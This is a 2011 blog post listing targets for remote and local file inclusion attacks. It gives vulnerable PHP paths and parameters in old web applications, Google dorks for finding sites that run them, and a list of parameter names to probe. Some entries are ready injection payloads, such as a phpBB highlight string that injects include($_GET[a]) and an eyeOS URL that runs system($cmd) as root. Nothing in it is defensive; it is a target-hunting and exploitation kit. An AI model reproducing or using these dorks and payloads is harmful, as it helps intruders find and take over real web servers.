Thursday, 28 April 2011

Dork List ForRFI AND LFI


/modules/coppermine/themes/default/theme.php?THEME_DIR=


/modules/coppermine/include/init.inc.php?CPG_M_DIR=


/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=


/coppermine/themes/maze/theme.php?THEME_DIR=


/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=


/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=


/myPHPCalendar/admin.php?cal_dir=


/agendax/addevent.inc.php?agendax_path=


/modules/mod_mainmenu.php?mosConfig_absolute_path=


/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=


/main.php?page=


/default.php?page=


/index.php?action=


/index1.php?p=


/index2.php?x=


/index2.php?content=


/index.php?conteudo=


/index.php?cat=


/include/new-visitor.inc.php?lvc_include_dir=


/modules/agendax/addevent.inc.php?agendax_path=


/shoutbox/expanded.php?conf=


/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


/pivot/modules/module_db.php?pivot_path=


/library/editor/editor.php?root=


/library/lib.php?root=


/e107/e107_handlers/secure_img_render.php?p=


/zentrack/index.php?configFile=


/main.php?x=


/becommunity/community/index.php?pageurl=


/GradeMap/index.php?page=


/index4.php?body=


/side/index.php?side=


/main.php?page=


/es/index.php?action=


/index.php?sec=


/index.php?main=


/index.php?sec=


/index.php?menu=


/html/page.php?page=


/page.php?view=


/index.php?menu=


/main.php?view=


/index.php?page=


/content.php?page=


/main.php?page=


/index.php?x=


/main_site.php?page=


/index.php?L2=


/content.php?page=


/main.php?page=


/index.php?x=


/main_site.php?page=


/index.php?L2=


/index.php?show=


/tutorials/print.php?page=


/index.php?page=


/index.php?level=


/index.php?file=


/index.php?inter_url=


/index.php?page=


/index2.php?menu=


/index.php?level=


/index1.php?main=


/index1.php?nav=


/index1.php?link=


/index2.php?page=


/index.php?myContent=


/index.php?TWC=


/index.php?sec=


/index1.php?main=


/index2.php?page=


/index.php?babInstallPath=


/main.php?body=


/index.php?z=


/main.php?view=


/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


/index.php?file=


/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=




1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=


2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=


4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=


5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


6. allinurl:ihm.php?p=


7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=


8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=


10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=


11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=


12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=


14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=


15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=


16. allinurl:ihm.php?p=*


14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=


15. allinurl:.php?bodyfile=


16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


17. allinurl:forums.html
/modules.php?name=


18. allinurl:/default.php?page=home


19. allinurl:/folder.php?id=


20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=


21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


22. allinurl:application.php?base_path=
/application.php?base_path=


23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=


24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=


26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=


27. allinurl:/forum/
/forum/admin/index.php?inc_conf=


28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=


29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=


30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=


31. keyword : "Powered by iUser"
/common.php?include_path=


32. allinurl: "static.php?load="
/static.php?load=


33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=


34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=


35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=


LFI(Local File Inclusion)


acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

No comments:

Post a Comment